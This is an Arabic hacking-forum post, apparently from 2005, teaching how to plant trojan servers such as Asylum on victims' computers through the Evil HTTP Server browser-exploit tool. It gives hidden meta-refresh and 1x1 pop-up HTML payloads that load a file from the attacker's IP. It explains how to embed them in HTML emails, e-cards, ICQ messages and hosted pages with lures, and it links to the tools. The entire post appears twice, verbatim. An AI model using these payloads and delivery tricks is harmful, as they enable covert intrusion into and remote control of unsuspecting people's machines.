عاشق المستحيل
18-02-2005, 10:09 PM
باسم الله نبدأ
من المعروف انا الأداه الأولى لأي مخترق بالنسبه للأجهزه هو السيرفر والذي لا غنى له عن اي مخترق حيث انه الاداه الفعاله والتي تتيح للمخترق التسلل الى جهاز الضحيه في الخفاء. لكن مش اي سيرفر ممكن يخدم في المجال ده..ييجي الوقتي سؤال مهم وهو ما مميزات السيرفر الناجح؟؟؟
طيب ارد عليك واقولك انه في مميزات كتير اوي من قوة وتشفير ومرونه واهم شيء الحجم.. بص معايه هنا بعض البرامج المهمه و احجام سيرفراتها:
1. برامج التحكم عن بعد..
و تحتوي على خصائص كثيرة..
SubSeven ( 363 kb )Packed
asassin ( 211 kb )Packed
Optix Pro ( 350 kb )Packed
Nova ( 361 ) Packed
SR ( 145 kb )Packed
2. برامج ال *********Downloaders
mini-********* vers. 1.0 ( 1 kb )unPacked
FearLess Downloader ( 4 kb )Packed
Shut-it Downloader
AcidReig ( 400 kb ) packed
EES Polymorphic Downloader
3. برامج ال UpLoaders
the Thing 1.6 ( 2.5 kb )packed
mini command ( 2.5 kb )packed
Asylum 0.1.4 ( 3 kb ) packed
طبعا من القوائم السابقه نستنتج ان سيرفرات كل من برامج ال uploaders و downloaders هي الاصغر حجما.. نيجي من الاستنتاج ده لأول نقطه معانا النهارده في احترافيه الاختراق وهي :
* يفضل بل يستحسن وبقوة ان يكون حجم الباتش اصغر ما يمكن لتجنب زرع الشك في نفس الضحيه.
طيب يعني على كده برامج التحكم الرئيسيه زي البرورات او السب 7 الي سيرفراتها تتميز بحجم كبير نسبيا ملهاش اي لازمه؟؟؟ ارد عليك واقولك بالطبع لا فالبرامج دي هي واجهة الاتصال الرئيسيه بينك وبين الضحيه بس ازاي اقدر انزل باتشات البرامج دي في جهاز الضحيه من غير ما يكتشفها او يشك فيها بسبب حجمها الكبير؟؟
هو ده محور موضوعنا النهارده والي بيدور حول بعض الاساليب الاحترافيه في الاختراق وزرع الباتش في جهاز الضحيه..
1- أول أسلوب هنا هو استخدام برامج الابلودر uploader والبرامج دي سيرفراتها تتميز بصغر حجمها الشنيع وسهوله دخولها الى جهاز الضحيه.وانا هنا بافضل استخدام برنامج Asylum لقوته وصغر حجم سيرفره(3 كيلوبايت بس ده طبعا بعد الضغط ببرامج الضغط زي ال upx!) انا طبعا مش حشرح البرامج دي لأني متأكد انكم كلكوا جربتوها بحكمكم متخصصين اما بالنسبه للمتدئين فأنا قلت في البدايه ان الموضوع ده مش ليهم!
2- طيب احنا خلصنا من الخطوة الأولى وهي تكوين السيرفر لأحد برامج الأبلود واخترنا برنامج Asylum للقيام بالمهمه.. نيجي بقه لطريقه تنزيل السيرفر طبعا بعد التشفير وبدون دمج لأن احنا مهمتنا نصغر حجم السيرفر مش نكبره.
أول طريقه هنا هي باستخدام برنامج evil http وهو من البرامج الي بتستغل بعض الثغرات في المتصفح لعمل تنزيل اوتوماتيكي للسيرفر على جهاز الضحية..طبعا البرنامج ده قديم وانا شارحه في موضوع منفصل بالمنتدى انا الجديد الي حجيبه هنا هو الطرق الجديده والمبتكرة للاستفاده المثلا من امكانيا هذا البرنامج..
يالله أمري لله ححط شرح مبسط لبرنامج evil Http ركزوا معايه يا جماعه:
برنامج Evil HttP Server
مبرمجه مبرمج عالمي مشهور تابع لفريق موقع evil eye software و هو من المشاركين في برمجة و أفكار برنامج optix pro...
(((( APHEX ))))
البرنامج ليس به عيوب الا أنه يعتبر للفاهمين و الممارسين.. لأنه ليس به خصائص أبدا..
يعني مثلا مش بيجيبلك الأي بي بتاعك و يجهزلك اللنك عشان تديه للضحية جاهز.. لأ مفيش ..
انت طبعا تعتبر فاهم و مش هتفرف تجيب الأي بي و تزبط اللنك ؟؟؟؟
البرنامج عبارة عن 2 text و زرين و مربع في الأسفل..
الزرين تختار منهم الأول : السيرفر و الثاني : الثغرة..
مرفق مع البرنامج 5 ثغرات.. انا عندي 6 في ثغرة خاصة ( لم يضعها المبرمج مع البرنامج أثناء اصداره طبعا انا لا أقول اني اكتشفتها لكن أخذتها من واحد أخذها من واحد أخدها من واحد الخ واحد أخذها من صديق المبرمج... او انه لم يكن اكتشفها لسة لما أصدر البرنامج..
و ال 2 text يظهر فيهم مسار الملفين اللي اخترتهم و هما السيرفر و الثغرة..
و تحت في مربع يظهر فيه الأي بي لما يقوم الضحية بفتح الوصلة او الضغط عليها..
نيجي بقه للمهم وحيكون على شكل اسإله وأجوبه:
.::.... الأسئلة ....::.
1.كيف أجعل السيرفر يتحمل بدون اعطاء اللنك للضحية و كيف تعمل كل هذه الطرق ؟؟؟
2. كيف أبعث ايميل عند فتحه تقوم برامج ينزل السيرفر للضحية ؟؟؟
3. كيف أبعثه أيضا في شكل Greeting card حتى لا يشك الضحية ؟؟؟
4. كيف أبعثه في ال ICQ بحيث تقوم ينزل السيرفر للضحية ؟؟
5. كيف أعطي الضحية صفحة انترنت ملغمة بنفس الطرق
( حتى لا تضطرالى اعطاء الأي بي الخاص بيك.. )
6. بلاش 6 متأكد انها ستضر العرب أكثر من انها تنفهعم..
.::.... الاجابات ....::.
.::.... الاجابة 1 :
الفكرة و ديناميكية العمل :
هي طبعا مش اننا بنلغم الصفحات او الايملات او اي حاجة.. لأ بنستخدم أفكار عشان الضحية مياخدش باله
الفكرة الأولى..:
كود تحويل ...انت مش هتحول لصفحة انترنت انت هتحول للنك اللي فيه الأيبي الخاص بيك مثلا :
http://127.0.0.1/1.jpg يفضل الامتداد في الأخر يكون JPG. اول لما يفتح الايميل هيتحول و ينفتح السيرفر في جهازه.. الطريقة 100% شغالة الا اذا كان الضحية عارف الثغرة اللي في المتصفح اللي بتستخدمها البرامج اللي قلت عنها ^^^ .. و مغلقها او عامل UPDATE او انه خواف جدا و مغلقها لخوفه الشديد و بيبحث عن الأمان الدائم...
طبعا انت تقدر تستخدم الفكرة في أي خدمة تدعم ال HTML ( غير : 127.0.0.1 بالأي بي بتاعك ).
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
..........................
الفكرة الثانية المطورة :
طبعا لا أقصد اني اخترعت اختراع او اكتشاف لكن جه في بالي كود HTML تاني أفضل
طبعا احنا في الطريقة الاولى كنا بنستخدم التحويل لكن مش شايفين ان التحويل ممكن يشكك الضحية !!!
ايه رأيكم في حل عشان الضحية مش يشك..
صفحة انترنت تفتح بمجرد ما يفتح الضحية يوصل الضحية الطريقة اللي انت مستخدمها.. زي ايميل او صفحة او icq او اي حاجة من الطرق...
هدي المثال على الايميل...
مثلا دلوقتي لو انت وصلك ايميل و حمل الايميل و فجأة لقيت الصفحة بتحولك على اي حاجة تانية !!
ممكن تشك و تعمل STOP للتحميل صح!!
ايه الحل.؟؟؟؟ انا دايما عندي الحل
شوف الكود التاني ده بيفتح الصفحة في أقصى اسفل يسار الشاشة و لا تظهر الصفحة.. و الصفحة حجمها :
1 في 1 pixels يعني متجيش حجم نقطة.. لكن شغالة 100%
الصفحة هتفتح و طبعا انت تكون محدد الموقع اللي هتفتح عليه.. مثلا http://www.google.com/
لكن احنا مش محتاجين الموقع في حاجة..
احنا محتاجين نحط اللنك اللي فيه ال IP بتاعك مثلا : http://127.0.0.1/1.jpg
اول لما تفتح الصفحة...... خلاص أصبح ضحيتك..
الكود :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
تغير 127.0.0.1 بالأي بي الخاااااص بيك..
..................................................
.::.... الاجابة 2 ....::.
في ناس كثيرة بتسمع و ب انه في ايميلات ملغومة و اول لما تفتح الايميل يتحمل عندك فيروس او سيرفر.. ده كان بثغرة المتصفح بـ ACTIVE X
لكن احنا طريقتنا سلسة سهلة سريعة و فعالة.
الخطوات......... :
1 : لازم يكون عندك ايميل في الياهو لأننا نحتاج لأيميل يدعم الHTML
(الفاهمين اول لما قرأوا HTML أكيد فهموا كل شئ.. )
2 : بعد ما تدخل الايميل : اعمل COMPOSE أي اكتب رسالة جديدة..
و في أسفل خانة كتابة الرسالة على اليمين.. ستجد رز تفعيل ال HTML
فعلها و اكتب ايميلك.. اكتب الايميل اللي انت عايزه و حاول تخليها حاجة ملفتة للنظر مثلا
العنوان : قتل زوجته و اتجه لذبح أولاده.. ههههه
أهم شئ في الرسالة : كتابة الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
3. اكتب ايميل الضحية و المعلومات الباقية و كل حاجة و ارسل..
..................................................
.::.... الاجابة 3 ....::.
طبعا كل الناس تفرح لما يبعث لها Greeting card
هنتكلم عن http://www.123greetings.com/
الموقع يدعم ال HTML في كروته الرائعة..
اذا أردت أن توقع بضحية في قبضتك استعمل الطرق اللي ذكرتها انا البرامج و كدا..
1. تدخل الموقع الموضح أعلاه.. أحلى ما فيه لا يحتاج اشتراك او غيره..
2. اختر أي كارد من أي نوع صداقة , حب , اهداء, على راحتك.. مع مراعاة جنس المستقبل يعني :
افرض بنت تبعث بإسم ولد او بنت اما لو ولد لازم بنت ههههههه
3. ادخل و بعد ما تكتب الايميل و المعلومات و كل حاجة.... في الرسالة الخاصة اللي بتكتبها لمستلم
الكارد..ضع الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
و ارسله.. الأن عند فتح الضحية للايميل سيجد انه لديه كارد جديد مرسل. هيفتح الايميل و يدخل على اللنك اللي فيه الكاردفي الموقع لكن اول لما يفتح الكارد ( مبررروك أصبح ضحيتك )..
..................................................
.::.... الاجابة 4 ....::.
لازم يكون عندك ICQ
الخطوات........... :
1. اختر greeting card من قائمة اليوزر.. يعني اضغط على اليوزر نيم بتاع الضحية و اختارها..
2. و في الكروت اختر من الموضحة : Just Because
و العنوان title اختار smile او all smile
3. و في مكان كتابة الرسالة عليك و على الكود لكن لا تلصقه في اولها
يعني دوس ENTER عشرين مرة مثلا و اكتب الكود في الآخر..
الحكاية دي موجودة الاصدارات القديمة فقط تقريبا.. انا عندي 2001b موجودة
الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
.................................................. .
.::.... الاجابة 5 ....::.
طبعا البرامج الموضحة أعلاه قلنا تقوم بفتح جهازك كسيرفر تحميل لذا يجب اعطاء الأي بي للضحية كصفحة انترنت او صورة مثلا : http://127.0.0.1/1.jpg و تقوله دي صورتي لكن طبعا مين الغبي اللي يدي الأيبي بتاعه لأي أحد مهما كان مبتدئاً ؟؟
الطريقة دي تغنيك عن اعطاء اللنك اللي فيه الأي بي للضحية.. و كمان اذا استخدمت الكود التاني افضل لو مثلا عامل صفحة و فيها فلاش و اديتها للضحية و قلتله شوف الفلاش و قولي ايه رأيك هيفتح الصفحة الكود هيفتح صفحة جانبية مش ظاهرة و يعمل شغله.. و الفلاش هيظهر عادي و انتوا و أفكاركم...
الخطوات :.........
1. افتح برنامج تحرير صفحات انترنت.. Front Page او اذا مفيش عندك نكتفي بال NotePad
2. بكل سهولة لو في برنامج Front Page ادخل قسم ال HTML و لو في notepad حط على طول..
راعي تغيير الصيغة : 127.0.0.1 بالأيبي الخاص بك..
الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
و احفظ الصفحة و حملها على موقع اسضافة مثلا : http://www.geocities.com/
في ال notepad لحفظ الصفحة بإمتداد html يجب عمل الأتي اكتب الاسم بالإمتداد new.html
تحت خانة كتابة الاسم : هتلاقي الاختيار على Text ************************s اضغط عليها و اختار All Files (*.*)
.................................................. ..
.::.... الاجابة 6 ....::.
أسف لا استطيع لغيرتي على شعب العرب... والله انا لا أقصد الكل.. لكن كلنا نعلم ان هناك بعض
الأشخاص عندهم عقدة نقص في الشخصية يعني بيحس انه قوي لما يخترق او يؤذي أخيه العربي المسلم..
لذا سأكتفي بالأشخاص الموثوق بهم.. و أسف مرة أخرى..
مع ان الفاهمين منكم أكيد عرفوا ماذا أقصد و المحترفين.. و أنا أضمنهم لأن المحترفين مش فاضيين للعب و ايذاء اخوانهم.. انما للتعلم و الاستفادة و تنمية قدراتهم...
ملحوظـــــــــــــــــات مهمـــــــــــة يجب قراءتهــــــا :
1-شوفوا اول لما تقرأ الملاحظات لو عايز تطبق الطرق..
اعمل ملف نوت باد جديد.. و انسخ الأكواد فيه لكن على انها انجليزي يعني طريقة العرض من اليسار لليمين.
........
2. اخواني مستخدمين الاتصال العادي : modem dialup connection راعوا تغيير الأي بي.. يعني مش واحد يبعث الايميل بكود التحويل و فيه الأي بي و يطلع برا الانترنت و يدخل بعدين و يسأل الضحية وصلك الايميل و هو بيدحك عشان اخترقه.. بعدين يحاول يعمل connect...
يفضل استخدام جميع الطرق المذكورة و الضحايا اونلاين.. لأن الأي بي الخاص بيك يتغير الا اذا انت معاك أي بي ثابت واخده من مزود الخدمة ISP... و كمان البرنامج لازم يكون شغاااااااال...
اما بالنسبة لمستخدمي ال DSL ممكن تسيب الكمبيور مفتوح و البرنامج مفتوح و اول لما الضحية يفتح هيشتغل عادي......
و كمان راعوا ان الثغرة ممكن تكون مغلقة في كمبيوتر الضحية... مع برنامج Evil http server يمكنك تغيير الثغرة... و أنا سأقوم بتوضيح لاحظته اذا كنت تعلم ان الضحية يستخدم XP استخدم برنامج auto-download
اما غير ذلك حاول ببرنامج Evil http بثغرة ال MPEG لأنها الأكثر انتشارا..
هذه هي بعض الأساليب الذكيه للاختراق وارجوا منكم استخدامها ضد أعداء الاسلام والمسلمين فقط..
للعلم بعض الأساليب منقوله والبعض الآخر من تطويري الشخصي وجميع الحقوق محفوظه لشبكة اكس كيو ايت
البرامج المستخدمه:
برنامج Asylum (http://www.3arabawys.com/up/file/ASYLUM_014_FE.zip)
برنامج Evil-http (http://www.3arabawys.com/up/file/EvilHTTPServer-0.1.0.zip)
من المعروف انا الأداه الأولى لأي مخترق بالنسبه للأجهزه هو السيرفر والذي لا غنى له عن اي مخترق حيث انه الاداه الفعاله والتي تتيح للمخترق التسلل الى جهاز الضحيه في الخفاء. لكن مش اي سيرفر ممكن يخدم في المجال ده..ييجي الوقتي سؤال مهم وهو ما مميزات السيرفر الناجح؟؟؟
طيب ارد عليك واقولك انه في مميزات كتير اوي من قوة وتشفير ومرونه واهم شيء الحجم.. بص معايه هنا بعض البرامج المهمه و احجام سيرفراتها:
1. برامج التحكم عن بعد..
و تحتوي على خصائص كثيرة..
SubSeven ( 363 kb )Packed
asassin ( 211 kb )Packed
Optix Pro ( 350 kb )Packed
Nova ( 361 ) Packed
SR ( 145 kb )Packed
2. برامج ال *********Downloaders
mini-********* vers. 1.0 ( 1 kb )unPacked
FearLess Downloader ( 4 kb )Packed
Shut-it Downloader
AcidReig ( 400 kb ) packed
EES Polymorphic Downloader
3. برامج ال UpLoaders
the Thing 1.6 ( 2.5 kb )packed
mini command ( 2.5 kb )packed
Asylum 0.1.4 ( 3 kb ) packed
طبعا من القوائم السابقه نستنتج ان سيرفرات كل من برامج ال uploaders و downloaders هي الاصغر حجما.. نيجي من الاستنتاج ده لأول نقطه معانا النهارده في احترافيه الاختراق وهي :
* يفضل بل يستحسن وبقوة ان يكون حجم الباتش اصغر ما يمكن لتجنب زرع الشك في نفس الضحيه.
طيب يعني على كده برامج التحكم الرئيسيه زي البرورات او السب 7 الي سيرفراتها تتميز بحجم كبير نسبيا ملهاش اي لازمه؟؟؟ ارد عليك واقولك بالطبع لا فالبرامج دي هي واجهة الاتصال الرئيسيه بينك وبين الضحيه بس ازاي اقدر انزل باتشات البرامج دي في جهاز الضحيه من غير ما يكتشفها او يشك فيها بسبب حجمها الكبير؟؟
هو ده محور موضوعنا النهارده والي بيدور حول بعض الاساليب الاحترافيه في الاختراق وزرع الباتش في جهاز الضحيه..
1- أول أسلوب هنا هو استخدام برامج الابلودر uploader والبرامج دي سيرفراتها تتميز بصغر حجمها الشنيع وسهوله دخولها الى جهاز الضحيه.وانا هنا بافضل استخدام برنامج Asylum لقوته وصغر حجم سيرفره(3 كيلوبايت بس ده طبعا بعد الضغط ببرامج الضغط زي ال upx!) انا طبعا مش حشرح البرامج دي لأني متأكد انكم كلكوا جربتوها بحكمكم متخصصين اما بالنسبه للمتدئين فأنا قلت في البدايه ان الموضوع ده مش ليهم!
2- طيب احنا خلصنا من الخطوة الأولى وهي تكوين السيرفر لأحد برامج الأبلود واخترنا برنامج Asylum للقيام بالمهمه.. نيجي بقه لطريقه تنزيل السيرفر طبعا بعد التشفير وبدون دمج لأن احنا مهمتنا نصغر حجم السيرفر مش نكبره.
أول طريقه هنا هي باستخدام برنامج evil http وهو من البرامج الي بتستغل بعض الثغرات في المتصفح لعمل تنزيل اوتوماتيكي للسيرفر على جهاز الضحية..طبعا البرنامج ده قديم وانا شارحه في موضوع منفصل بالمنتدى انا الجديد الي حجيبه هنا هو الطرق الجديده والمبتكرة للاستفاده المثلا من امكانيا هذا البرنامج..
يالله أمري لله ححط شرح مبسط لبرنامج evil Http ركزوا معايه يا جماعه:
برنامج Evil HttP Server
مبرمجه مبرمج عالمي مشهور تابع لفريق موقع evil eye software و هو من المشاركين في برمجة و أفكار برنامج optix pro...
(((( APHEX ))))
البرنامج ليس به عيوب الا أنه يعتبر للفاهمين و الممارسين.. لأنه ليس به خصائص أبدا..
يعني مثلا مش بيجيبلك الأي بي بتاعك و يجهزلك اللنك عشان تديه للضحية جاهز.. لأ مفيش ..
انت طبعا تعتبر فاهم و مش هتفرف تجيب الأي بي و تزبط اللنك ؟؟؟؟
البرنامج عبارة عن 2 text و زرين و مربع في الأسفل..
الزرين تختار منهم الأول : السيرفر و الثاني : الثغرة..
مرفق مع البرنامج 5 ثغرات.. انا عندي 6 في ثغرة خاصة ( لم يضعها المبرمج مع البرنامج أثناء اصداره طبعا انا لا أقول اني اكتشفتها لكن أخذتها من واحد أخذها من واحد أخدها من واحد الخ واحد أخذها من صديق المبرمج... او انه لم يكن اكتشفها لسة لما أصدر البرنامج..
و ال 2 text يظهر فيهم مسار الملفين اللي اخترتهم و هما السيرفر و الثغرة..
و تحت في مربع يظهر فيه الأي بي لما يقوم الضحية بفتح الوصلة او الضغط عليها..
نيجي بقه للمهم وحيكون على شكل اسإله وأجوبه:
.::.... الأسئلة ....::.
1.كيف أجعل السيرفر يتحمل بدون اعطاء اللنك للضحية و كيف تعمل كل هذه الطرق ؟؟؟
2. كيف أبعث ايميل عند فتحه تقوم برامج ينزل السيرفر للضحية ؟؟؟
3. كيف أبعثه أيضا في شكل Greeting card حتى لا يشك الضحية ؟؟؟
4. كيف أبعثه في ال ICQ بحيث تقوم ينزل السيرفر للضحية ؟؟
5. كيف أعطي الضحية صفحة انترنت ملغمة بنفس الطرق
( حتى لا تضطرالى اعطاء الأي بي الخاص بيك.. )
6. بلاش 6 متأكد انها ستضر العرب أكثر من انها تنفهعم..
.::.... الاجابات ....::.
.::.... الاجابة 1 :
الفكرة و ديناميكية العمل :
هي طبعا مش اننا بنلغم الصفحات او الايملات او اي حاجة.. لأ بنستخدم أفكار عشان الضحية مياخدش باله
الفكرة الأولى..:
كود تحويل ...انت مش هتحول لصفحة انترنت انت هتحول للنك اللي فيه الأيبي الخاص بيك مثلا :
http://127.0.0.1/1.jpg يفضل الامتداد في الأخر يكون JPG. اول لما يفتح الايميل هيتحول و ينفتح السيرفر في جهازه.. الطريقة 100% شغالة الا اذا كان الضحية عارف الثغرة اللي في المتصفح اللي بتستخدمها البرامج اللي قلت عنها ^^^ .. و مغلقها او عامل UPDATE او انه خواف جدا و مغلقها لخوفه الشديد و بيبحث عن الأمان الدائم...
طبعا انت تقدر تستخدم الفكرة في أي خدمة تدعم ال HTML ( غير : 127.0.0.1 بالأي بي بتاعك ).
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
..........................
الفكرة الثانية المطورة :
طبعا لا أقصد اني اخترعت اختراع او اكتشاف لكن جه في بالي كود HTML تاني أفضل
طبعا احنا في الطريقة الاولى كنا بنستخدم التحويل لكن مش شايفين ان التحويل ممكن يشكك الضحية !!!
ايه رأيكم في حل عشان الضحية مش يشك..
صفحة انترنت تفتح بمجرد ما يفتح الضحية يوصل الضحية الطريقة اللي انت مستخدمها.. زي ايميل او صفحة او icq او اي حاجة من الطرق...
هدي المثال على الايميل...
مثلا دلوقتي لو انت وصلك ايميل و حمل الايميل و فجأة لقيت الصفحة بتحولك على اي حاجة تانية !!
ممكن تشك و تعمل STOP للتحميل صح!!
ايه الحل.؟؟؟؟ انا دايما عندي الحل
شوف الكود التاني ده بيفتح الصفحة في أقصى اسفل يسار الشاشة و لا تظهر الصفحة.. و الصفحة حجمها :
1 في 1 pixels يعني متجيش حجم نقطة.. لكن شغالة 100%
الصفحة هتفتح و طبعا انت تكون محدد الموقع اللي هتفتح عليه.. مثلا http://www.google.com/
لكن احنا مش محتاجين الموقع في حاجة..
احنا محتاجين نحط اللنك اللي فيه ال IP بتاعك مثلا : http://127.0.0.1/1.jpg
اول لما تفتح الصفحة...... خلاص أصبح ضحيتك..
الكود :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
تغير 127.0.0.1 بالأي بي الخاااااص بيك..
..................................................
.::.... الاجابة 2 ....::.
في ناس كثيرة بتسمع و ب انه في ايميلات ملغومة و اول لما تفتح الايميل يتحمل عندك فيروس او سيرفر.. ده كان بثغرة المتصفح بـ ACTIVE X
لكن احنا طريقتنا سلسة سهلة سريعة و فعالة.
الخطوات......... :
1 : لازم يكون عندك ايميل في الياهو لأننا نحتاج لأيميل يدعم الHTML
(الفاهمين اول لما قرأوا HTML أكيد فهموا كل شئ.. )
2 : بعد ما تدخل الايميل : اعمل COMPOSE أي اكتب رسالة جديدة..
و في أسفل خانة كتابة الرسالة على اليمين.. ستجد رز تفعيل ال HTML
فعلها و اكتب ايميلك.. اكتب الايميل اللي انت عايزه و حاول تخليها حاجة ملفتة للنظر مثلا
العنوان : قتل زوجته و اتجه لذبح أولاده.. ههههه
أهم شئ في الرسالة : كتابة الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
3. اكتب ايميل الضحية و المعلومات الباقية و كل حاجة و ارسل..
..................................................
.::.... الاجابة 3 ....::.
طبعا كل الناس تفرح لما يبعث لها Greeting card
هنتكلم عن http://www.123greetings.com/
الموقع يدعم ال HTML في كروته الرائعة..
اذا أردت أن توقع بضحية في قبضتك استعمل الطرق اللي ذكرتها انا البرامج و كدا..
1. تدخل الموقع الموضح أعلاه.. أحلى ما فيه لا يحتاج اشتراك او غيره..
2. اختر أي كارد من أي نوع صداقة , حب , اهداء, على راحتك.. مع مراعاة جنس المستقبل يعني :
افرض بنت تبعث بإسم ولد او بنت اما لو ولد لازم بنت ههههههه
3. ادخل و بعد ما تكتب الايميل و المعلومات و كل حاجة.... في الرسالة الخاصة اللي بتكتبها لمستلم
الكارد..ضع الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
و ارسله.. الأن عند فتح الضحية للايميل سيجد انه لديه كارد جديد مرسل. هيفتح الايميل و يدخل على اللنك اللي فيه الكاردفي الموقع لكن اول لما يفتح الكارد ( مبررروك أصبح ضحيتك )..
..................................................
.::.... الاجابة 4 ....::.
لازم يكون عندك ICQ
الخطوات........... :
1. اختر greeting card من قائمة اليوزر.. يعني اضغط على اليوزر نيم بتاع الضحية و اختارها..
2. و في الكروت اختر من الموضحة : Just Because
و العنوان title اختار smile او all smile
3. و في مكان كتابة الرسالة عليك و على الكود لكن لا تلصقه في اولها
يعني دوس ENTER عشرين مرة مثلا و اكتب الكود في الآخر..
الحكاية دي موجودة الاصدارات القديمة فقط تقريبا.. انا عندي 2001b موجودة
الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
.................................................. .
.::.... الاجابة 5 ....::.
طبعا البرامج الموضحة أعلاه قلنا تقوم بفتح جهازك كسيرفر تحميل لذا يجب اعطاء الأي بي للضحية كصفحة انترنت او صورة مثلا : http://127.0.0.1/1.jpg و تقوله دي صورتي لكن طبعا مين الغبي اللي يدي الأيبي بتاعه لأي أحد مهما كان مبتدئاً ؟؟
الطريقة دي تغنيك عن اعطاء اللنك اللي فيه الأي بي للضحية.. و كمان اذا استخدمت الكود التاني افضل لو مثلا عامل صفحة و فيها فلاش و اديتها للضحية و قلتله شوف الفلاش و قولي ايه رأيك هيفتح الصفحة الكود هيفتح صفحة جانبية مش ظاهرة و يعمل شغله.. و الفلاش هيظهر عادي و انتوا و أفكاركم...
الخطوات :.........
1. افتح برنامج تحرير صفحات انترنت.. Front Page او اذا مفيش عندك نكتفي بال NotePad
2. بكل سهولة لو في برنامج Front Page ادخل قسم ال HTML و لو في notepad حط على طول..
راعي تغيير الصيغة : 127.0.0.1 بالأيبي الخاص بك..
الكود الأول او الثاني ( يفضل الثاني ) :
الاول :
كود HTML:
<************ ******************************=Refresh *********************="0; url=http://127.0.0.1/1.jpg">
الثاني :
كود HTML:
<****************** LANGUAGE='******************************'>window.open('http://127.0.0.1/1.jpg','','left=1000,top=1000,width=1,height=1');</******************>
و احفظ الصفحة و حملها على موقع اسضافة مثلا : http://www.geocities.com/
في ال notepad لحفظ الصفحة بإمتداد html يجب عمل الأتي اكتب الاسم بالإمتداد new.html
تحت خانة كتابة الاسم : هتلاقي الاختيار على Text ************************s اضغط عليها و اختار All Files (*.*)
.................................................. ..
.::.... الاجابة 6 ....::.
أسف لا استطيع لغيرتي على شعب العرب... والله انا لا أقصد الكل.. لكن كلنا نعلم ان هناك بعض
الأشخاص عندهم عقدة نقص في الشخصية يعني بيحس انه قوي لما يخترق او يؤذي أخيه العربي المسلم..
لذا سأكتفي بالأشخاص الموثوق بهم.. و أسف مرة أخرى..
مع ان الفاهمين منكم أكيد عرفوا ماذا أقصد و المحترفين.. و أنا أضمنهم لأن المحترفين مش فاضيين للعب و ايذاء اخوانهم.. انما للتعلم و الاستفادة و تنمية قدراتهم...
ملحوظـــــــــــــــــات مهمـــــــــــة يجب قراءتهــــــا :
1-شوفوا اول لما تقرأ الملاحظات لو عايز تطبق الطرق..
اعمل ملف نوت باد جديد.. و انسخ الأكواد فيه لكن على انها انجليزي يعني طريقة العرض من اليسار لليمين.
........
2. اخواني مستخدمين الاتصال العادي : modem dialup connection راعوا تغيير الأي بي.. يعني مش واحد يبعث الايميل بكود التحويل و فيه الأي بي و يطلع برا الانترنت و يدخل بعدين و يسأل الضحية وصلك الايميل و هو بيدحك عشان اخترقه.. بعدين يحاول يعمل connect...
يفضل استخدام جميع الطرق المذكورة و الضحايا اونلاين.. لأن الأي بي الخاص بيك يتغير الا اذا انت معاك أي بي ثابت واخده من مزود الخدمة ISP... و كمان البرنامج لازم يكون شغاااااااال...
اما بالنسبة لمستخدمي ال DSL ممكن تسيب الكمبيور مفتوح و البرنامج مفتوح و اول لما الضحية يفتح هيشتغل عادي......
و كمان راعوا ان الثغرة ممكن تكون مغلقة في كمبيوتر الضحية... مع برنامج Evil http server يمكنك تغيير الثغرة... و أنا سأقوم بتوضيح لاحظته اذا كنت تعلم ان الضحية يستخدم XP استخدم برنامج auto-download
اما غير ذلك حاول ببرنامج Evil http بثغرة ال MPEG لأنها الأكثر انتشارا..
هذه هي بعض الأساليب الذكيه للاختراق وارجوا منكم استخدامها ضد أعداء الاسلام والمسلمين فقط..
للعلم بعض الأساليب منقوله والبعض الآخر من تطويري الشخصي وجميع الحقوق محفوظه لشبكة اكس كيو ايت
البرامج المستخدمه:
برنامج Asylum (http://www.3arabawys.com/up/file/ASYLUM_014_FE.zip)
برنامج Evil-http (http://www.3arabawys.com/up/file/EvilHTTPServer-0.1.0.zip)